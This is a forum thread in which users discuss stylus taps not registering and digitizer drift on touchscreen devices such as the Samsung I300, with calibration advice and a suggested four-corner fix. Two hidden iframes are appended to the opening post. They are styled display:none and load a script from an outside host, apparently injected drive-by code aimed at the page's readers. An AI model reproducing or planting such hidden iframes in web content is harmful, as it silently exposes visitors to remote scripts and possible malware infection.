+ Reply to Thread

Thread: Screen Numbness

Screen Numbness

Is there a numbness problem with some units? There are places on the screen where ti stylus does not register. Does anyone else have this problem? My screen often does not register stylus presses at the upper right-hand corner, for example the next- week arrow in Date Book. Similarly, the icons on the lower left side of the dialing screen sometimes don't register. Is this endemic, or do I have a defective unit<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

warm reset then go thru the digitizer.. when in digitizer, kinda tap a little off center on the dots and see if that will help out...

i personally dont have this problem...

Exclamation Digitizer Drift

Digitizer Drift Problem too...

Hey I have the same problem with my Samsung I300 phone! In the upper right hand corner of the screen the stylus registers a point being touched 5-10 pixels higher than where the stylus actually is. This is actually a gradual drift, you you use a drawing program like BugMe! you can draw horizontal lines and see that as you gradually get near the upper right portion of the touch screen, the stylus entries will "drift" upwards. This is pretty annoying and I can't remember always how to compensate when this happens. I've ordered an RMA kit from SprintPCS to fix this problem. I'm sure there COULD be a software fix/hack for this since the digitizer only chooses points in the upper left, middle and lowerright corners for calibration. If the other two corners (upper right and lower left) were included, perhaps they could write a 4-corner calibration algorithm and account for the differences of drift in the up-down direction differently between the 4 quadrants of the touch screen. Until, then, my new I300 is in the mail!!!!

Liner